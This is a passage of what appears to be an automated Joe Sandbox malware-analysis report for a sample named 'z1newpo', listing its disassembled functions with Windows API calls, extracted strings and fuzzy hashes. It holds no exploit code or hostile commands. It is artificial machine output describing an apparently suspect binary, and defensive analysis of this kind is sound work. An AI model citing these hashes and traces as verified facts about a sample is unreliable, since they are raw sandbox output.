                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                    Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00464B28
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                    • _wcslen.LIBCMT ref: 00464C28
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                    • String ID: D
                                                    • API String ID: 1914653954-2746444292
                                                    • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                    • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                    Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 0045CE39
                                                    • __wsplitpath.LIBCMT ref: 0045CE78
                                                    • _wcscat.LIBCMT ref: 0045CE8B
                                                    • _wcscat.LIBCMT ref: 0045CE9E
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                    • _wcscpy.LIBCMT ref: 0045CF61
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                    • String ID: *.*
                                                    • API String ID: 1153243558-438819550
                                                    • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                    • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                    • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                    Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll
                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                    • API String ID: 3832890014-4202584635
                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                    Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                    • GetFocus.USER32 ref: 0046A0DD
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$CtrlFocus
                                                    • String ID: 0
                                                    • API String ID: 1534620443-4108050209
                                                    • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                    • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                    Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateDestroy
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1109047481-3856767331
                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                    Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                    • String ID: 0
                                                    • API String ID: 1441871840-4108050209
                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                    Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 3631882475-2268648507
                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                    Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                    • SendMessageW.USER32 ref: 00471740
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                    • SendMessageW.USER32 ref: 0047184F
                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 4116747274-0
                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                    Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                    • _wcslen.LIBCMT ref: 00461683
                                                    • __swprintf.LIBCMT ref: 00461721
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                    • GetParent.USER32(?), ref: 004618C3
                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                    • String ID: %s%u
                                                    • API String ID: 1899580136-679674701
                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                    Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu$Sleep
                                                    • String ID: 0
                                                    • API String ID: 1196289194-4108050209
                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                    Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                    • String ID: (
                                                    • API String ID: 3300687185-3887548279
                                                    • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
